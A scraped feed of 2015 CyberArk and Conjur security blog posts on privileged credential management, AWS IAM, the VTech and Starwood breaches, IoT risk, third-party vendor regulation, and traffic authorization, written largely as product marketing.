As the year winds down, and you begin to plan for 2016, it’s a good time to review insights from security experts to ensure your proactive security measures reflect best practices. If you haven’t read this report, now is the time. Download the full threat report: Privileged Account Exploits Shift the Front Lines of Cyber Security.

]]>
Privileged Credentials in COTS Applications: What IT Pros and Their Application Providers Need to Know Now https://www.cyberark.com/blog/privileged-credentials-in-cots-applications-what-it-pros-and-their-application-providers-need-to-know-now/ Fri, 04 Dec 2015 20:36:42 +0000 https://www.cyberark.com/blog//

Organizations recognize the importance of locking down privileged account access. As they proactively build enterprise-wide security programs, they also increasingly understand this access is not limited to users with a “heart beat.” Third party, commercial off-the-shelf (COTS) applications often require the same level of access to privileged accounts that an IT Administrator or DBA needs to do his or her day-to-day work.

In the case of a COTS application, the credentials are used to gain access to a given target in order to perform a task – such as resetting a service, conducting a vulnerability scan or initiating a back-up. From a risk perspective, it’s important to not only understand this is the same level of powerful admin access, but also how pervasive an application’s access is across an organization. Considering the number of COTS applications within an enterprise can be in the thousands and the types of key processes that these apps repetitively do on a daily basis, the magnitude of risk to the enterprise can start to be appreciated.

The fact that the privileged credentials accessed by applications are often not well maintained, managed, secured or even tracked exacerbates the risk. Why aren’t these credentials better managed? There are a number of reasons. For example, they are not frequently updated because it’s a cumbersome process if it’s not automated.  IT admins don’t always want to change embedded passwords because they don’t know what other systems could be negatively impacted. In that case, operations takes priority over security. Some vendors even tell companies not to change the credentials because they don’t know what will happen. That’s scary to us and inviting to a potential attacker.

So with this in mind, you ask might ask again, ‘why does an application’ need to reach out and login into a target system? There is a wide range of critical functions including:

  • Restart a service
  • Set a policy
  • Provision an SSL certificate
  • Do a vulnerability scan
  • Define identify configurations
  • Do an asset discovery
  • Initiate a backup
  • Validate a service ticket
  • Import/Export data
  • Execute DevOps read/writes

Based on this, a growing number of our customers now have a ‘mandate’ to improve privileged credential management horizontally – across all ‘people’ users as well as applications that leverage privileged access. To address the latter requirement, customers often ask us to work with their application vendor to ensure they can effectively meet this mandate. Customers want the application’s credentials to be secured and managed via their existing CyberArk deployment.

Some of the types of applications that customers have requested work with CyberArk to securely retrieve and use privileged credentials include:

  • Vulnerability Management
  • IT Operations Management
  • DevOps
  • Data Backup
  • Discovery
  • IAM/Governance Tools
  • Configuration Management
  • Orchestration
  • Data Management/ETL applications
  • Cloud tools

As a result, we have a rapidly growing roster of technology partners that integrate with CyberArk via our Application Identity Manger API. This allows the application vendors to focus on their core competencies, while leveraging the privileged credential management expertise and capability that CyberArk provides to more than 2000 customers worldwide. In addition, they’re delivering this integration to market and using it as a competitive differentiator.

Collectively, this is a positive development in the market. Customers have a better understanding of cyber security risks and increasingly take proactive measures to mitigate risk. Technology vendors are beginning to do the same.  Enterprise security requires a collaborative approach that extends beyond any one vendor and customer. Better integration and informed decisions improve the entire technology ecosystem.

Technology vendors interested in integration opportunities with CyberArk should contact us directly for more information: https://www.cyberark.com/contact/.

]]>
How To Improve AWS IAM Security https://www.cyberark.com/blog/how-to-improve-aws-iam-security/ Thu, 03 Dec 2015 14:43:00 +0000 https://cyberarkvx2.wpengine.com/blog/how-to-improve-aws-iam-security/  

Although many of us love AWS and the Identity and Access Management system for EC2, the workflows around it need some improvement. If you’ve ever used it, you’ll probably understand what we’re talking about…It’s hard to configure, hard to understand, and hard to troubleshoot.

Luckily, Conjur lets you manage end user access to the AWS console while avoiding the typical governance and compliance nightmare.

IAM_Overview.png

There are a few reason AWS IAM needs improvement:

  1. First, users are provisioned manually which means, without attention, user access may persist after the termination of employment.

  2. Validating user control is also very difficult. It can be a challenge ensuring that the principle of least privilege is upheld among each user and as you add and maintain more users, it turns into a bigger headache.

  3. High flexibility leaves room for error.

  4. Vendor lock-in: You can’t rely on IAM roles to manage permissions in your on-premise data centers or other cloud providers.

  5. Additionally, IAM does not manage anything at the web traffic or Unix permissions level.

Here’s How Conjur Solves these Problems:

  1. Users and groups are synchronized from your existing enterprise LDAP or Active Directory Server.

    • This allows you to use your existing user/group structure instead of creating and maintaining another one.

  2. Roles are created for machines, allowing them to join a specific layer of hosts.

    • There is a role per type of application, webservice, database, etc.

  3. Users can SSH to a trusted machine which has the permissions to fetch andIAM user’s credentials.

    • This SSH access is governed by Conjur.

  4. Privilege on the trusted machine is restricted by the group, mapping your existing enterprise structure to permissions via `sudoers.d`

  5. Next, scripts will be run that fetch the required credentials without revealing them to the executing user.

  6. Finally, Conjur will audit the execution of these scripts.

We take the headache out of managing user access to the AWS console. Have any questions? Let us know! We would love to chat about how Conjur can help better secure your AWS or hybrid cloud environment.

conjur-demo
//

 

]]>
The VTech Hack, Exposing Thousands of Children’s Data https://www.cyberark.com/blog/the-vtech-hack-exposing-thousands-of-childrens-data/ Wed, 02 Dec 2015 20:46:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-vtech-hack-exposing-thousands-of-childrens-data/  

It looks like another tech company has been added to the naughty list. Children’s toymaker VTech has been hacked, the breach affecting over 5 million customers. The worst part?… This time it’s our children’s information that’s at risk.  

In response to the November 14th breach of its Learning Lodge app store, VTech suspended its app stores across the world. The hack affected 5 million customers, revealing names, email addresses, passwords, IP addresses, mailing addresses, download histories, and secret questions as well as the genders and birthdays of the children in the VTech database.

Here’s everything you need to know:

VTech has confirmed that 4.9 million parent accounts were compromised, and 6.4 million related children’s profiles tied to those accounts were also exposed. NBC news points out that VTech is working to downplay the hack by ensuring customers that credit card information was not compromised. It is important to note that although you can cancel an exposed credit card and eliminate most risk, you can’t simply retract your children’s leaked personal information…. once it’s out there, it’s out there.

Wired reports that the breach went unnoticed for 10 days. Although this seems to be an improvement from other breaches that have gone unnoticed for months it is still unsettling to realize that a majority of breaches are not discovered immediately.

This piece from engadget points out that this story is particularly interesting because it involves products for children, which typically don’t get much coverage when it comes to data security. This observation begs the question, should companies geared toward children put an even bigger focus on data security than companies selling to adults?  

Security analyst Troy Hunt has a very different story and perspective than VTech. According to Hunt 227,000 of the 4.8million people affected were children. Hunt argues that contrary to claims by VTech, the kids passwords that were stolen weren’t encrypted at all.

The scariest aspect of this breach is that children’s photos were stored on the breached data base as well as chat logs between parents and their kids. VTech still hasn’t clarified why this type of information was kept there in the first place.

It seems now that every company is a target, regardless of their industry, because of the vast amount of information that is being captured. It is important for companies to keep in mind that both applications and infrastructure are vulnerable to these types of attacks. Because of this, it is crucial to have a solution to identify, authorize, and audit all of these rapidly moving parts. As companies move faster to stay ahead of the competition, they increasingly run the risk of sacrificing security, and put their sensitive data at risk.

 

 

]]>
Contextualizing Privileged Account Security for the C-Suite: The Importance of CISO Communication Skills https://www.cyberark.com/blog/contextualizing-privileged-account-security-for-the-c-suite-the-importance-of-ciso-communication-skills/ Tue, 01 Dec 2015 22:37:42 +0000 https://www.cyberark.com/blog//

In a recent Fortune Magazine article, “The 21st Century Club,” Editor Alan Murray wrote, “We are now in the early stages of a third Industrial Revolution, with an entirely different economic logic that is causing fundamental changes in the structure of business.” He also noted, “The 21st century will belong to those who embrace that disruption rather than fight it.” This is also an era of fierce competition and today’s C-level leaders face tremendous pressure to innovate and grow while driving digital transformation across their organizations.

With this business environment and rapid change, companies also have to proactively protect IP, brand and other assets. Among increasingly numerous strategic priorities, C-level leaders also have to plan for cyber threats that will affect business. Heightened media coverage of data breaches – many involving compromised privileged credentials – has increased the C-Suite’s interest in cyber security programs. Industry statistics show that 80 percent of board members say that cyber security is discussed at most or all board meetings, while 87 percent of CEOs are concerned about cyber threats, and half are ‘extremely concerned.’ The interest is there, but now there has to be sustained focus and attention to effectively roll out enterprise-wide security programs. To get C-level buy-in, CISOs must not only share the right amount of information, but also the level of detail that will resonate the most.

Gartner’s Paul Proctor provided an example of this. For an automobile CEO, he noted, it’s best to translate security problems into a language s/he understands – car production in this case. Executives know that one new automobile rolls off the assembly line every 90 seconds. That means an hour of IT downtime results in 40 fewer cars being assembled.  Effective communications would focus on this type of a cause/effect. Ideally, the security mangers “report less cars in inventory to their executives, not IT downtime. Their executives don’t care about IT downtime; they care about cars.”

As their roles continue to evolve, CISOs recognize the value of effective communication skills in gaining executive cooperation and building lasting support for enterprise-wide change.

Azeem Bashir, former CISO at Fujitsu, echoed this advice in a recent CSO piece, stating, “Communication is essential. If the board is not listening to you, then rolling out your strategy or transformation program is just a tick-in-the-box. You need buy in at the top. Depending on the issue, communicating properly to a level they can understand is essential. They are fed up with scare stories.” He also advises CISOs to get advice from peers, to be less driven by tick-box compliance and to be more focused on agile leadership and TQM (top quality management) in order to address business risk.

On that note, CyberArk is championing an industry initiative called the CISO View to ensure CISOs can learn best practices from their peers. It’s no surprise that communication was among the key topics the 12 CISOs from Global 1000 companies explored in the inaugural CISO View report, The Balancing Act: The CISO View on Improving Privileged Access Controls.

The CISOs interviewed offer practical recommendations for communicating more effectively, building a powerful case, and ultimately, getting buy-in from the executive team to bolster an organization’s privileged account security program. The report includes recommendations based upon their experience rolling out enterprise wide privileged account security programs.

In the report, Gary Harbison, Chief Information Security Officer for Monsanto Company says, “Make it real. Show the executives how business data can be accessed through privileged accounts. It’s the quickest way for an attacker to go after data and one of their main tools to drive a data breach.”

Within the report, some of the data the CISOs recommend for building and presenting a case for the C-suite includes:

  • Analysis of high profile breaches as they relate to your company
  • Penetration testing results
  • Benchmarking
  • Compliance requirements
  • Proof-of-concept results

You’ll also find detailed information on the key metrics that these experienced CISOs have used to help the C-Suite understand the value of a privileged access management program and how to best track the progress.

Ready for more actionable advice? Download the report.

]]>
Another Day, Another Hotel Breach https://www.cyberark.com/blog/another-day-another-hotel-breach/ Mon, 30 Nov 2015 14:35:00 +0000 https://cyberarkvx2.wpengine.com/blog/another-day-another-hotel-breach/  

Looks like another popular hotel chain has been hacked. Starwood hotels has reported that payment systems at 54 of its locations were targeted by a malware attack. Credit card information such as first and last names, card numbers, expiration dates, and security codes were taken, however, personal information such as billing addresses, etc were unaffected.

As we’ve previously discussed, it is crucial for enterprises to make sure that third party providers are adequately securing data. The Starwood breach is an example of this, as the payment systems that were hacked were third party POS machines located in gift shops, restaurants, and coffee shops.

 

Here’s what you need to know:

Starwood maintains that the guest reservation system was not compromised in the hacks so if you didn’t dine at the hotel or make any purchases outside of the room, you’re sage. For some of the affected hotels, information was exposed for months, the breach going undetected for months.

This is a comprehensive list of the all of the breached hotels. In additional to hotels names it also provides the dates during which credit cards could have been compromised. 

If you’re currently staying at a Starwood hotel, or are planning on relaxing there during the upcoming holidays, not to worry, the situation has been handled, the malware is no longer a threat, and all credit card information is now secured.

This piece from eWeek mentions It took almost 5 months for the breaches to be reported. This doesn’t seem to be much of a coincidence, as Starwood was very recently acquired by Marriott International. It would make sense that Starwood wouldn’t publicize the breach until after the deal was done.  

If these POS devices had better security and audit capabilities in place, perhaps the breaches wouldn’t have gone undetected for as long as they did. Thankfully, with each new breach new pressure is put on enterprises to have better security in place to protect consumer data. Hopefully, the new year will mean a new commitment toward secrets management and infrastructure security. 

If you and your organization are just getting started with your 2016 security planning, or are in the process of moving to a hybrid cloud strategy, it is vital that you do your research before getting started. We’ve created a free, dynamic security glossary that has all the information you need to get you up to speed in no time. 

 

 

]]>
5 Things We’re Thankful For This Thanksgiving https://www.cyberark.com/blog/5-things-were-thankful-for-this-thanksgiving/ Wed, 25 Nov 2015 16:02:00 +0000 https://cyberarkvx2.wpengine.com/blog/5-things-were-thankful-for-this-thanksgiving/  

It’s the time of year when we gather together with friends and family and actively appreciate all of the wonderful things we have in our life. We’d like to call some attention to the vital people within the Conjur family that have been instrumental in making 2015 our most successful year ever.

thanksgiving_graphic.jpg

1) Our Team

Although everyone in this post is important, this one is the most dear to us. Everyday we are surrounded by talented and intelligent individuals who are inspired to work as a team and deliver outstanding results. They are committed to our mission and we are truly grateful for their dedication. Not only are they exceptional people, but they’re pretty fun too, playing Smash Brothers together, participating in a 100 Push Up Challenge ( yup, you read that right, 100), Escaping the Room in Boston, and having a company hack-a-thon! 

2) Our Investors

We’re lucky to have an impressive team of investors who truly believe in our mission and are totally committed to our success. Many thanks to Amplify Partners, Avalon Ventures, and Andy Palmer

3) Our Customers

Our customers are some of the best in the business and we applaud their thought leadership and vision. These are the companies who are ahead-of-the-curve when it comes to security. We are so thankful that they put faith in our product to help them secure their infrastructure; we take our duty very seriously and we are thrilled to work with them.

4) Our Hometown and Partnerships

It has been a fantastic couple of years as part of the blossoming tech community in Boston. We are proud to be involved with MassTLC and are happy local partners with HubSpot, InsightSquared, and YesWare (all Boston-based companies, and all awesome!). Also, a special thanks to Drizly, for helping us keep our office fully stocked on Friday afternoons!

4) 5) Our Team Mascot, Furnando

Furnando is our favorite furry friend. Yes, he keeps us on our toes but he always manages to brighten up our week… look at that little face, how could you not love him?!

image1_2-078689-edited.jpg

Wishing you and yours a very happy and restful Thanksgiving,

The Conjur Team 

 

]]>
Security and the Internet of Things https://www.cyberark.com/blog/security-and-the-internet-of-things/ Tue, 24 Nov 2015 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/security-and-the-internet-of-things/  

Today, it seems everything is automated. I can set my coffee pot to begin brewing at 6:30AM sharp, turn my lights off with a remote control, and start my car from bed on a cold winter morning, all with the push of a button. 

The Downfall of Going DigitalOnce you start going digital it’s hard to stop; you want to automate every single part of your life. I can travel to any destination, regardless of whether I actually know how to get there, trusting my car’s navigation system to lead the way. Heck, some people can even turn on their home alarm system or adjust heat settings all from their smartphone. By 2020 the amount of Internet-connected things will reach 50 billion. These numbers are exciting, as they mean that we will become more efficient and technologically advanced. Although the Internet of Things (IoT) is making our lives so much simpler it can also pose security concerns. As automation increases it is important that more security measures are also taken so we can safely reap all the benefits the IoT has to offer. We cannot forget that without proper security, we are putting ourselves at risk.

What seems to be less talked about are the potentially negative effects of the IOT. We heard about the Jeep wifi hack a few months ago. Although that scenario was planned, the fact still remains that it was possible. In the next five years, approximately 90% of cars will be connected to the internet.  A study from consulting firm McKinsey & Co found that 90% of accidents will be eliminated thanks to self driving cars, as cars will be able to effectively communicate with one another, avoiding collisions and making the road a safer place to be. However, if people can hack into our car systems and run them off the road, does this statistic make much of a difference?

As drivers, we can practice safer driving while behind the wheel but we can’t protect ourselves from being hacked. If all of the car wifi systems were breached it would pose devastating effects for drivers and manufacturers alike. One of the newest technologies is automated weapons, helping soldiers deliver more precise shots. This seems like a fantastic development to avoid bystander casualties, and it is, until the opposition is able to hack into those weapons and change the intended target.

Healthcare is one of the newest industries the IoT is predicted to improve. With pill bottles that remember when How Innovation Brings Security Risksthey were last opened, wireless devices to monitor heart rate and body fat percentages, and digital glucose testers, it is much easier for patients to practice at-home-care. Doctors are able to track all of these statistics to make sure their patients are well, avoiding unnecessary trips to the office. These devices also let doctors  take care of more people throughout the day. But as our data is being sent back and forth to different devices, and stored in multiple data centers, it is at risk of being compromised, especially if the third party vendors don’t take proper security precautions. 

With an increase in devices that connect to the internet there is a natural increase in points of entry for hackers to access our data. As more industries automate, more sensitive information will become vulnerable. Our medical records, social security numbers, passwords, and alarm codes are just some of the data that is at risk. There have already been extensive breaches just by having credit cards and digital medical files… If our stance on security remains the same, imagine how much worse it will get when everything is digital. You might not think someone hacking into your wearable device is a problem, but if hackers install malware that uncovers all of your passwords and is able to access your smartphone, all of your personal information and accounts could be compromised. 

IoT takes human interaction out of the equation; instead we have machines making decisions for us. It might seem more precise to have computers zeroing in on our target or deciding when it is safe to change lanes; however, these methods are a lot more volatile than those of human operators if not properly secured.

In order to reap all the benefits the IoT has to offer, we need to make sure that security is a chief factor going forward, specifically as it relates to Identity.  The enterprises developing these exciting technologies need to be able to place an identity on all of their devices, users, and machines that contribute to the development, testing, and production of IoT. With these newly-created identities, enterprises can then manage the authorization and authentication of their environment for maximum control and compliance.  Without this important data, organizations will be flying blind with no insight into who has access to what, when.

At Conjur we help companies solve this very problem.  To learn more schedule a demo here.

 

 

]]>
Global 1000 CISOs Share Experience with Improving Privileged Access Controls https://www.cyberark.com/blog/global-1000-cisos-share-experience-with-improving-privileged-access-controls/ Thu, 19 Nov 2015 13:37:52 +0000 https://www.cyberark.com/blog//

Data breaches have become a fixture in today’s headlines. Time and time again, security researchers pinpoint a common denominator in the attack chain: the exploitation of privileged accounts. There is a growing realization that preventing the theft of highly privileged credentials could short-circuit the majority of today’s sophisticated cyber attacks. This has prompted many organizations to rethink existing privileged access controls and prioritize the implementation of comprehensive privileged account security programs.

Protecting privileged credentials is one of the most pressing challenges CISOs face today. Consider this perspective:  “If you don’t have good practices in privileged account management, you’re making it very easy for adversaries to traverse your whole network. If they get a hold of an over-privileged account, they’ll run through the environment like a brushfire,” Jim Connelly, Vice President & Chief Information Security Officer, Lockheed Martin

To help organizations accelerate their strategies to improve privileged access controls, CyberArk sponsored the CISO View Industry initiative. As part of this initiative, industry analyst firm Robinson Insight conducted research via in-depth interviews with some of the world’s leading security executives at Global 1000 organizations across major industries. The CISO panel included representation from: ING Bank, CIBC, Lockheed Martin, Starbucks, ANZ, CSX Corporation, Monsanto Company, Manulife, Rockwell Automation, News UK, Carlson Wagonlit Travel and McKesson.

Available today, the report, entitled The Balancing Act: The CISO View on Improving Privileged Access Controls, explores considerations for successfully implementing enterprise-wide privileged account security programs. The panelists’ first-hand perspectives provide valuable insights and sage advice based upon a wide range of experience implementing critical, widespread changes.

The recommendations consider the right balance between enabling and restricting high-levels of access to information assets. Whether planning or implementing a program, there is useful guidance available for security leaders and practitioners.

For example, key considerations early in the planning process include, “What should you do, and when?” The first chapter offers peer-to-peer guidance from the expert panel on making these core decisions, and they offer perspective on the best approach for identifying and prioritizing accounts. As Dave Estlick, Information Security Chief at Starbucks explains, “You need to figure out, ‘Where’s the area that I’m going to be able to demonstrate business value?’ not just the uplift in security but operational efficiencies.”

Sharing information on good security practices is more important than ever as organizations face increasingly sophisticated cyber threats. At CyberArk, we believe if security teams are armed with the leading wisdom of the CISO community, it will help strengthen security strategies and lead to better-protected organizations. As a provider of privileged account security solutions, we recognize that protecting privileged access is more than a security challenge – it also spans people, process and technology. It requires engagement and ongoing collaboration with the CISO community to solve.

We’ll continue to highlight and explore some of the issues addressed by the CISO panel in future blog posts, however, you can download and read the full report now: https://www.cyberark.com/cisoview/.

]]>
We’re At DevOpsDays Ohio https://www.cyberark.com/blog/were-at-devopsdays-ohio/ Wed, 18 Nov 2015 21:45:00 +0000 https://cyberarkvx2.wpengine.com/blog/were-at-devopsdays-ohio/  

Our Developer Advocate, Dustin Collins, is attending DevOps Days Ohio today and tomorrow. He will be speaking tomorrow morning (11/19) at 9:55 AM on Human Error and Secure Systems.

Dustin will cover the traditional view of human error and discuss how this idea can thwart our ability to create and maintain secure systems. how it hinders our ability to develop and preserve secure systems.

By understanding human error in a new way  we can minimize risk and maximize the learning opportunity in software development and operations. Not sure if these new ideas will fly in your organization? Dustin will cover the right way to “sell” these concepts.

Want to connect with Dustin in Ohio? He’d love to chat with you! Drop us a line and we can schedule some time for you both to meet.

 

 

]]>
2015 Data Breach Forecast, A Year in Review https://www.cyberark.com/blog/2015-data-breach-forecast-a-year-in-review/ Wed, 18 Nov 2015 17:39:00 +0000 https://cyberarkvx2.wpengine.com/blog/2015-data-breach-forecast-a-year-in-review/  

Not all publicity is good publicity, that’s no secret. As more and more data breaches make headlines, consumers and executives are hopefully starting to get the message that security needs to become a priority or there will be costly repercussions.

Early in 2015 Experian published its second annual data breach industry forecast. It predicted that executives would start to take cybersecurity more seriously and take more steps to make sure proper solutions were in place to mitigate or eliminate risk. As we head toward the holidays and begin thinking about 2016, it is helpful to look back and learn from the mistakes and mishaps that occurred.  Since 2015 was the year of breaches such as Ashley Madison, Hilton Hotels, and OPM there are plenty of examples to study.  

Experian predicts data breachesExperian explains that it is difficult to prevent breaches as hackers are ahead of the curve in terms of new technologies; they are already planning on hacking systems most enterprises haven’t even adopted yet. The new chip technology for credit cards was announced early in 2015, with most companies adopting the chip cards in October. Since hackers have known department stores would make the switch it is likely that over the past year they have been searching for, and finding, vulnerabilities in the new, seemingly more secure payment system.

As the holidays are fast approaching more people will be using credit cards. There is such a sense of security in these new cards that people might be less careful with their information and less likely to notice suspicious activity on their credit card statements. Although it is great that retailers and credit card companies are making the switch to chip enabled payment, they must take additional steps to secure consumers’ private information.

Experian also predicted that 2015 would have an increase in breaches related to the healthcare industry. As the healthcare industry moves toward electronic record keeping, and holds some of patient’s most sensitive data, it is easy to understand how they are one of the biggest targets. Experian’s prediction was correct, the healthcare industry had the most data breaches in 2015, these incidents also exposing the most records. The Anthem breach, in which 78.8 million records were leaked, was the one of biggest healthcare breach of 2015.

In its research Experian found that in 2014, 73% of companies worked to create a data breach response plan. This confirms that businesses believe they have permeable weaknesses in their IT environments. Although creating a response plan is a step in the right direction, it really shouldn’t be the first, or only step, toward better security.

We should be focused on systems and applications that prevent data breaches before they happen. We need ahead of the curve technologies that will allow us to keep up with cyber criminals instead of remaining a step or two behind them. Experian published this study publicly; if companies had read it and taken the warnings and predictions seriously many of these breaches could have been prevented, or at least detected sooner.

Although it is helpful to find out that our information has been compromised as soon as possible, what steps can we really take if things like social security numbers have been exposed? As it is typical for breaches to be discovered years after the fact, we, as consumers, are left with even less options. Although it is great that businesses are working to create appropriate response plans to these types of hacks, this can’t be their only step toward pushing for better security; this cannot be the final solution. 

With our current focus on increased automation, the Internet of Things has made us more prone to attacks in 2015 and will continue to do so in 2016 if certain preventative measures aren’t in place. For more information on securing your infrastructure check out this case study in which we outline how to manage, secure, and audit permissions across an entire cloud infrastructure.  

 

 

]]>
Reducing the Cyber Attack Surface for Critical Infrastructure https://www.cyberark.com/blog/reducing-the-cyber-attack-surface-for-critical-infrastructure/ Tue, 17 Nov 2015 20:46:11 +0000 https://www.cyberark.com/blog//

Our CEO Udi Mokady was on Mad Money last week talking with Host Jim Cramer about the cyber security market and the proactive measures companies take to secure the inside of their networks. Our products are sold globally and across many industries. Noting our growing and diverse customer base, Jim asked, “What is manufacturing worried about?” Udi explained that they want to protect intellectual property and personally identifiable information about employees, customers and suppliers.

It’s a good reminder that people traditionally associate cyber security and breaches with financial services companies, but cyber security threats are now horizontal for a variety of reasons.

Not only do companies have to rethink what hackers view as valuable – money is not the only motivation, they also need to understand there are many threat actors including nation states, non-nation states, hacktivists, malicious insiders, vendor/supply chain access and terrorists. There are hackers for hire, and there is a market for them.

While the most intrusive breaches primarily target the IT/Corporate environment, serious actors increasingly target industrial control systems. They are stealthily surveying systems and building the capabilities to execute attacks in the long term. (Keep in mind, attackers often have more than 200 days on a network before being discovered.)

Risks associated with our critical infrastructure continue to increase as companies adopt new technologies. According to a Chatham House Report issued in September 2015, “there is a rise in factors that make nuclear facilities more vulnerable to cyber attack, with facilities increasingly adopting digital systems, making use of commercial off-the-shelf software, and connecting to the internet. All of these offer considerable cost savings but are easier to hack.

New realities and use of technology require rethinking processes, security measures and interactions. For example, there has to be better coordination and communications between IT security and OT. As pointed out in a recent article by the InfoSec Institute,OT engineers have to report any activity that has been conducted at the equipment and any suspicious activity they have noticed. Every modification to one of the components in the nuclear facility could potentially open the doors to cyber threats, so the IT engineers have to monitor carefully the “evolution” of the plant. Face-to-face contact between IT engineers and IT personnel is a key factor to sustain mutual understanding between the two cultures so close, but so different.” 

November is Critical Infrastructure Security and Resilience month, so it’s a good time to highlight related security threats, trends and mitigation best practices. I recently shared 5 IT Best Practices that also Mitigate Cyber Security Vulnerabilities in OT.

I would also like to share a few of the trends in OT security that were highlighted at NERC’s annual Grid Security Conference (GridSecCon):

  • Security is strategically significant in the C-suite. Awareness of the impact of a cyber attack on operations has put security on the C-Suite radar. Companies recognize the need to implement comprehensive risk management programs, rather than simply meet minimal regulatory compliance. This is encouraging news.

IT and OT security experts agree that companies can mitigate a significant amount of risk by proactively implementing best practices and security programs that reduce the attack surface. Some things to keep in mind:

  • Phishing and other social engineering techniques are still a prevalent entry point into the organization. Continue to foster a culture of security through social engineering awareness and training.
  • Operate as if you’ve been compromised. Perimeter security often cannot stop Advanced Persistent Threats (APTs). A determined attacker will get in, and that’s why security inside the network security is crucial, especially as it relates to privileged users (including vendors).
  • Lock down credentials and implement a credential-management program.
  • Monitor vendor access. Ensure that vendors only access the systems they’re authorized to access for a limited amount of time (i.e. no more idling sessions for 2 weeks).

Speaking of monitoring vendor access, you might be interested in watching one of our webinars, “Securing Remote Vendor Access with Privileged Account Security.”

]]>
3 Key Reasons You Should Know Your Service Provider https://www.cyberark.com/blog/3-key-reasons-you-should-know-your-service-provider/ Mon, 16 Nov 2015 19:25:00 +0000 https://cyberarkvx2.wpengine.com/blog/3-key-reasons-you-should-know-your-service-provider/  

Increasingly, regulators are coming to recognize the relative importance of third party firms to the financial services industry broadly, and to the DevOps Community specifically. For the past few years, a pattern has emerged in which regulators are placing an increased emphasis on how financial institutions work with, rely upon, and share sensitive data with third party firms.

Outsourced vs. In-House Service ProvidersWith no end in sight to how prevalent third party firms are to the financial infrastructure, it makes sense to look at a few highlights as it relates to their role:

  1. For years, the FFIEC has argued that regulated financial institutions must review the way in which outsourced firms, which service the smaller segment of the US banking market, access and store their data. The scope of these rules has extended from availability, controls, audit readiness, attestations (e.g. SOC I, SOC II, etc.), and standards such as those described by the ISACA, NIST, the Shared Assessments Program, and others. How those regulatory rules, controls frameworks, and standards systems expand and morph in the coming years as a result of a continually expanding and elaborate threat environment remains to be seen. One thing’s for sure; the status quo is certainly not a given.
  2. Recent large-scale data breaches have resulted in vulnerabilities within third party firms. In the U.S., there are many examples of this.  Just look at how an HVAC firm was implicated in the massive Target data breach or how the marathon charity-race organizers were identified by investigators as the main culprit in the large JPMC data breach. It is important to keep in mind that outside the public limelight there are even more scenarios that undoubtedly occur. In short, third party service providers of seemingly little relevance to the main organization they are servicing , oftentimes serve as the soft underbelly of these financial services firms.
  3. Recently, the SEC and FTC – neither of which have historically come out with specific rules and requirements having to do with cybersecurity – are pushing into this realm and the third party handling of data. This focus, which stems from the point I made above, will continue to grow if the past 12-18 months are any indication. To make matters worse, the hurry to issue regulations as a result of recent cybersecurity incidents makes it difficult for examinees and the other regulated entities to truly be prepared within the prescribed time-frame.

So, what does this all mean?

  • Well, firstly, how well you know the data practices of your downstream 3rd party firms is very critical. Even if this is not something that regulators are asking you about, it is only a matter of time until they do.
  • Secondly, it is key that you can demonstrate to your shareholders and internal stakeholders (e.g. internal audit, infosec, etc.) that you can prove how your 3rd party service providers are protecting your data. Again, if they’re not yet asking you for this sort of information, make no mistake – they will shortly.
  • And finally, if those 3rd party service providers know you are watching them and are able to audit them remotely, etc., then this is likely to enforce a strong culture of data integrity, data protection, and general best practice when it comes to access, authorization, and authentication. Research shows that changing cultural perceptions is critical as a first step in such situations.

 

]]>
What percentage of your Windows network is exposed to credential theft attacks? https://www.cyberark.com/blog/what-percentage-of-your-windows-network-is-exposed-to-credential-theft-attacks/ Thu, 12 Nov 2015 15:41:02 +0000 https://www.cyberark.com/blog//

Andrey Dulkin is the director of cyber innovation at CyberArk Labs. He leads a team of cyber security experts who conduct research focused on targeted attacks against organizational networks – the methods, tools and techniques employed by targeted attackers, as well as methods and techniques to detect and mitigate such attacks.

In a CyberArk Labs research report now available, “Analyzing Real-World Exposure to Windows Credential Theft Attacks,” the team reviewed data from more than 50 networks to identify the prevalence and risk of what are referred to as “highly threatening machines.”

According to Dulkin, “In a given network, there are typically a number of highly threatening machines that can give an attacker the credentials needed to completely compromise the majority of Windows hosts on the network. We’ve seen similar credential theft methods as the basis for major attacks across a number of organizations. Identifying these machines and securing the associated privileged credentials against theft and exploitation is a critical step in securing against advanced cyber attacks.”

Focused on measuring network exposure, the research aims to determine how much of a Windows network is typically exposed through the compromise of a single privileged account on a single Windows host.

His team found that, on average, 40 percent of the Windows hosts on a given network, if compromised, would provide an attacker credentials that would facilitate complete compromise of the vast majority of the other Windows hosts on that network – whether directly or through a series of compromises.

The research also examines several mitigation techniques to effectively reduce the threat level in the network. Download the report for full details here: https://www.cyberark.com/resource/analyzing-real-world-exposure-to-windows-credential-theft-attacks/

If you need a tool to identify the privileged accounts on your networks, you can use CyberArk Discovery & Audit (DNA). It’s free. For more information on CyberArk DNA and to sign up for a trial evaluation, visit https://www.cyberark.com/discovery-audit-cyberark-dna/.

]]>
5 Traffic Authorization Best Practices For IT Security https://www.cyberark.com/blog/5-traffic-authorization-best-practices-for-it-security/ Thu, 12 Nov 2015 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/5-traffic-authorization-best-practices-for-it-security/  

In any service-oriented architecture, securely governing the allowable communication between applications and services is key. It is equally as important to yield a secure way for developers and operations to directly communicate with applications and services.

Not sure how to do this? Traffic Authorization is the process of assigning everything in your infrastructure a unique identity with specific access control rules.  You need the ability to filter inbound and outbound traffic in an auditable fashion in order to achieve your compliance goals.

Traffic Authorization Tips

Here are our 5 Traffic Authorization Best Practices:

1) Don’t use passwords to grant access.

Instead, have a traffic authorization gatekeeper. A Gatekeeper is a reverse proxy that sits in from of the server, intercepting all inbound requests and verifying the token authenticity and authorization privileges of the client, using the Token Broker.   A gatekeeper also allows you to separate roles.

2) Use a Forwarder

A forwarder is a reverse proxy and you should use it to run on your local machine. It will intercept each connection to your server and place an authorization token on it. The authorization token is given to the forwarder by the Token Broker.

3) Set a Policy and Create Identities 

Always have a well defined security policy. The gatekeeper needs this policy, as this is what it enforces. Don’t forget to  assign client identities. Clients have to present an auth token to the gatekeeper.

4) Use Containers

Make deploying the application easier by using a Docker container so both the client and server can be launched and managed using the same tool: docker.

5) Make it easy on yourself… Avoid Software Defined Networking

Avoid using software defined networking to monitor and manage authorized inbound and outbound traffic. Not only is this method difficult to manage, but it also provides the risk that security will be loosened when people or code relax the traffic rules for their own purposes. Additionally, it is difficult to interact with these systems from outside of the cloud environment and thus all of your security is tied to the cloud vendor.

 

 

]]>
